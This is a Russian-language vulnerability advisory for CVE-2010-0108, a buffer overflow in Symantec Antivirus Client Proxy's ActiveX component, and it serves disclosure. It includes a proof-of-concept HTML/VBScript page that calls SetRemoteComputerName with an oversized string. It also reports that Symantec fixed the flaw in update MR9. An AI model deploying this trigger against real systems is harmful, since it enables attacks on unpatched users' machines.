CVE-2010-0108

Вендор

Symantec

Продукт

Symantec Antivirus Client Proxy Version 10 

Тип уязвимости

Переполнение буфера

Reported

04.05.2009

Date of Public Advisory

17.02.2010

Автор

Александр Поляков

Детальное описание

Злоумышленник может сконструировать html-страницу, содержащую вызов функции "SetRemoteComputerName", из ActiveX компонента cliproxy.objects.1, которая подвержена атаке переполнения буфера. 

Пример
*********
<html> 
<package><job id='DoneInVBS' debug='false' error='true'> 
<object classid='clsid:E381F1C0-910E-11D1-AB1E-00A0C90F8F6F' id='target' /> 
<script language='vbscript'> 

arg1=String(7188, "A") 

target.SetRemoteComputerName arg1 

</script> 
</html> 

Решение
********** 
Инженеры Symantec выпустили исправление для данной проблемы в обновлении MR9. Symantec рекомендует всем заказчикам установить данное доступное обновление. Symantec не осведомлен о каких-либо случаях эксплуатации этой уязвимости.